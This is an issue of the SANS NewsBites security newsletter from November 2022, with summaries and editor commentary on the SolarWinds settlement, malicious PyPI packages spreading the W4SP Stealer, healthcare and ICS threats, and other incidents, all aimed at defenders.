SANS NewsBites

SolarWinds Settles Multi-Million Dollar Shareholder Lawsuit and Expects SEC Enforcement Action; Microsoft Digital Defense Report 2022; Malicious Python Packages are Being Used to Spread W4SP Stealer Trojan

November 8, 2022  |  Volume XXIV - Issue #87

Top of the News


2022-11-07

The Five ICS Cybersecurity Critical Controls

In the spirit of the Critical Security Controls, SANS instructors Robert M. Lee and Tim Conway have been working with the community to analyze all the known real world ICS cyber attacks for the purpose of creating a list of the most important cybersecurity controls for organizations to implement. You can see the results and download the paper at https://www.sans.org/white-papers/five-ics-cybersecurity-critical-controls/


2022-11-07

SolarWinds Settles Shareholder Lawsuit for $26M

SolarWinds will pay $26 million to settle a lawsuit brought by its shareholders following its 2020 supply chain attack. SolarWinds says it expects to face enforcement action from the US Securities and Exchange Commission (DSEC) as well.

Editor's Note

Just this settlement cost alone is many time more than SolarWinds would have spent to prevent this incident. That $26M is likely less than 20% of SolarWinds total costs for failing to protect its development systems and product code, but raises a key point: more of these lawsuits are starting to succeed so we are seeing more settlements.

John Pescatore
John Pescatore

Expect the total expense to SolarWinds to be staggering, when you include this settlement, regulatory fines, remediation costs and lost business. The message here - make sure that you're leveraging guidance on securing your supply chain: whether a developer, distributer or consumer, nobody gets a free ride. If you see weaknesses in your processes, use the lessons learned from SolarWinds to build a case to take action, including taking a pass on suppliers and developers who are not doing their part to ensure their software is genuine and securely maintained/delivered.

Lee Neely
Lee Neely

An interesting defense strategy to claim they were the victim of “the most sophisticated cyberattack in history.” There are parallels to a defense strategy employed by a cyber insurance company in denying a claim by using the war exclusion clause. As reported neither strategy was successful. Adherence to basic cybersecurity practices, in this case a robust software configuration management process would have limited cost to the company in both cleanup, recovery, and damage to the brand.

Curtis Dukes
Curtis Dukes

Not only is $26M far more than preventing the problem would have cost, it is a tiny fraction of the cost to SolarWind's customers and to our economy as a whole. That said, this may be a step toward holding suppliers accountable for distributing malicious code.

William Hugh Murray
William Hugh Murray

2022-11-07

Microsoft Digital Defense Report 2022

Microsoft’s Digital Defense Report 2022 addresses the state of cybercrime, nation state threats, devices and infrastructure, cyber influence operations, and cyber resilience.

Editor's Note

One of the highlighted findings is that nation states stockpile zero-day vulnerabilities and exploits for future use. In my opinion, a nation state is not serious about preparing for a future conflict if they do not stockpile vulnerabilities to use during a crisis, and it should not be a surprise that zero days are withheld, but quickly exploited once they are discovered by others and patched.

Johannes Ullrich
Johannes Ullrich

The summary is a quick read which should grab your CISO's attention. Then grab the full report and dive into the Cyber Resilience section. Check the eye roll at that term: they provide background and context information for the improvements in cyber security that you can leverage in the board room and elsewhere in the business to get support for raising the bar along with actionable insights which could also help you build your punch list of things to investigate.

Lee Neely
Lee Neely

2022-11-05

W4SP Stealer Trojan Found in Malicious Python Packages

Researchers from Phylum have found nearly 30 malicious packages in Python Package Index (PyPI) that attempt to infect developers’ systems with the W4SP Stealer Trojan. The packages are clones of popular software packages with names that make them seem legitimate. The malicious packages have been downloaded 5,700 times.

Editor's Note

Luckily, these packages have not been downloaded very often. But they follow the proven playbook of publishing well-respected and frequently used packages under a slightly different name with malicious add-ons. This is likely going to catch developers new to Python. Python makes it relatively easy to enumerate packages used and you should regularly create lists of packages used by your code. Don't miss dependencies that may have been installed by package managers like pip.

Johannes Ullrich
Johannes Ullrich

The attackers used various techniques to import their trojan by modifying the __init.py__ or setup.py script, which are subtle and hard to spot. That import statement creates a temporary file which is executed, downloading obfuscated code from multiple sites which contains a compressed object which is, actually, the W4SP Stealer, which is designed to steal information from users’ systems including browser passwords, crypto wallets and interesting files with financial related information. Make sure that you're using the actual package you're expecting, and the vetted version, particularly if you're using any of the packages mentioned in the Phylum report.

Lee Neely
Lee Neely

The Rest of the Week's News


2022-11-07

NIST NCCoE Seeking Comments on Water System Cybersecurity Guidance

The US National Institute of Standards and Technology (NIST) National Cybersecurity Center of Excellence (NCCoE) is seeking feedback from stakeholders in the water and wastewater utilities sector on a project aimed at developing cybersecurity best practices for that sector. The project “will demonstrate solutions to protect the cybersecurity of infrastructure within the operating environments of WWS sector utilities that address common cybersecurity risks among water and wastewater systems utilities.” Comments will be accepted through December 19, 2022.

Editor's Note

Each of the critical infrastructure sectors share more in common when it comes to developing cybersecurity best practices. Establishing a common and prioritized set of safeguards to achieve a baseline cybersecurity posture across all sectors should be a national imperative. The CIS Critical Security Controls, starting with implementation group 1 are measurably effective against the top five attacks being used against every industry sector, why not start there.

Curtis Dukes
Curtis Dukes

Our water and waste system delivery operators are all over the map when it comes to size and complexity. As such, it's important that smaller system operators weigh in to make sure that guidance is relevant, actionable, and not expecting organizations with deeper pockets. Also needed is guidance for operators who have outsourced services who need to ensure those are also being operated securely.

Lee Neely
Lee Neely

2022-11-07

US HHS Brief on Iranian Threat Actors and Healthcare

The US Department of Health and Human Services (HHS) Health Sector Cybersecurity Coordination Center has published an alert detailing information about Iranian threat actors conducting attacks against organizations in the healthcare sector. The brief includes an analysis of the Iranian cyberattack landscape, attack analysis, and tactics, techniques, procedures, and mitigations.

Editor's Note

While the alert is specific to Iranian threat actors, the underlying cyberattack techniques employed are common across all threat actors. The CIS Community Defense Model uses the MITRE ATT&CK framework to document those common attack techniques into the top five attack patterns and then measures the effectiveness of the critical security controls in disrupting each of those attacks. At the end of the day, organizations want to defend themselves against cyberattack by every threat actor.

Curtis Dukes
Curtis Dukes

Whether or not you see yourself as a target from Iranian threat actors, leverage the briefing, taking the listed TTPs to tabletop exercises to make sure that you're covered for these attack vectors. Make sure that you test those assumptions and address gaps.

Lee Neely
Lee Neely

2022-11-07

US Senator Calls for Improved Healthcare Sector Cybersecurity

US Senator Mark Warner (D-Virginia) wants the Department of Health and Human Services. And the Cybersecurity and Infrastructure Security Agency (CFISA) to improve their collaboration in their efforts to protect the health care sector from cyberattacks. Warner has published a policy options paper that addresses “various challenges and proposals aimed at changing the way that the health care sector addresses the cybersecurity challenges it faces.“

Editor's Note

Providing actionable data to the healthcare industry is only part of the problem. Healthcare providers have to raise their own bar and increase focus on cyber security, which will require resources and may but the CISO at odds with those pushing to deliver more patient services quickly. Those CISOs can leverage resources from their local CISA offices, not just guidance but help with some activities. If you haven't been briefed on their services, reach out and ask.

Lee Neely
Lee Neely

It would be nice if government could "protect healthcare" but that is a big order. In practice the healthcare enterprises must protect themselves.

William Hugh Murray
William Hugh Murray

2022-11-04

CISA: Three ICS Vulnerability Warnings

The US Cybersecurity and Infrastructure Security Agency (CISA) has published three separate industrial control system (ICS) advisories. The vulnerabilities affect ETIC Telecom remote Access Server, Nokia ASIK AirScale System Module, and Delta Industrial Automation DIALink.

Editor's Note

Updates to the affected ETIC and DIALink products have been published. Implement mitigations from Nokia until a fix is released. Also make sure that you're properly segmenting these systems, allowing only vetted users and systems to access them. Don't enable direct access from the Internet: use a secure VPN, and possibly a bastion host. Make sure that entry points require MFA where possible; don't get undone after implementing layered defenses by a credential compromise.

Lee Neely
Lee Neely

2022-11-04

Boeing Jeppesen Cyber Incident Disrupted Some Flight Planning

Boeing subsidiary Jeppesen has “experienced a cyber incident affecting certain flight planning products and services.” The incident affected some flight planning products and services. The incident began on November 2; Jeppesen says that as of November 5, notice to air mission (NOTAM) bulletins were reactivated in their hosting environment.

Editor's Note

In this case, there were alternate NOTAM bulletin suppliers, the US FAA and International Civil Aviation Organization. Even so, no indication was made about how hard it was to switch to the alternate suppliers. When building DR plans, make sure to include the impact and difficulty of moving to your fail-over services, ensure that switch is viable and won't do more harm than being offline. The Aviation sector has become a target of attacks. According to the European Organisation for the Safety of Air Navigation, the industry is seeing ransomware attacks at a rate of one per week, and overall attacks are up as much as 530% year-on-year. That is not the sort of exercise to validate your DR plans I'm talking about. Test and vet them outside of an incident so you're ready. (And I hope you don't need them often.)

Lee Neely
Lee Neely

2022-11-07

Medibank Will Not Pay Ransom

Australian health insurance form Medibank will not pay a ransom demanded by attackers following a security incident that compromised the sensitive personal information of nearly 10 million customers. Medibank’s CEO said that “extensive advice” suggests that paying the ransom demand would not “ensure the return of our customers' data [or] prevent it from being published.”

Editor's Note

When paying the extorted ransom, there is not a guarantee that your data won't surface at a later date, other than the belief that ransomware operators won't do that to ensure they get paid moving forward. Medibank is assuming all their customer data have been accessed and advising customers accordingly. Two things to keep in mind if you find yourself in this position. First, known compromised companies are at the top of the list for attackers to attempt to "re-compromise" them, so remediation requires not only addressing the entry point but also making sure that you don't leave any behind; second, your customers are at risk for direct-attacks, whether their data is being used for identity theft or leveraged to make a case for them to pay a ransom directly, in which case you need to support your customers with identity protection and information/support in the event they are targeted.

Lee Neely
Lee Neely

2022-11-08

FBI Warns of Hacktivist Activity

The US Federal Bureau of Investigation (FBI) has published a Private Industry Notification warning that hacktivists are launching distributed denial-of-service (DDoS) attacks. The document includes recommendations for mitigating the effect of the attacks. Targets have included financial institutions, emergency services, airports, and healthcare-related facilities.

Editor's Note

The bulletin covers areas we've talked about before, which you should be following. To that list I would add making sure that you've enabled DDoS protections on your boundary, to include both your firewall and WAF. Also look at reporting discovered attacks, not just because you may have a regulatory requirement, but also to give agencies like the FBI and DHS/CISA information to go after the source.

Lee Neely
Lee Neely

Internet Storm Center Tech Corner

IPv4 Address Representations

https://isc.sans.edu/diary/IPv4+Address+Representations/29224/


Remcos Downloader With Unicode Obfuscation

https://isc.sans.edu/diary/Remcos+Downloader+with+Unicode+Obfuscation/29220/


Windows Malware With VHD Extension

https://isc.sans.edu/diary/Windows+Malware+with+VHD+Extension/29222/


Azure AD Certificate-based Authentication (CBA) on Mobile

https://techcommunity.microsoft.com/t5/microsoft-entra-azure-ad-blog/azure-ad-certificate-based-authentication-cba-on-mobile/ba-p/2365672


Twitter Scams

https://nakedsecurity.sophos.com/2022/11/04/twitter-blue-badge-email-scams-dont-fall-for-them/


Facebook Personal Information Removal

https://www.facebook.com/contacts/removal


RSA Conference Finds Unencrypted Confidential Data in WiFi Traffic

https://www.darkreading.com/remote-workforce/unencrypted-traffic-weak-e-mail-passwords-still-undermining-wifi-security


PyPi Packages Attempting to Deliver w4sp Stealer

https://blog.phylum.io/phylum-discovers-dozens-more-pypi-packages-attempting-to-deliver-w4sp-stealer-in-ongoing-supply-chain-attack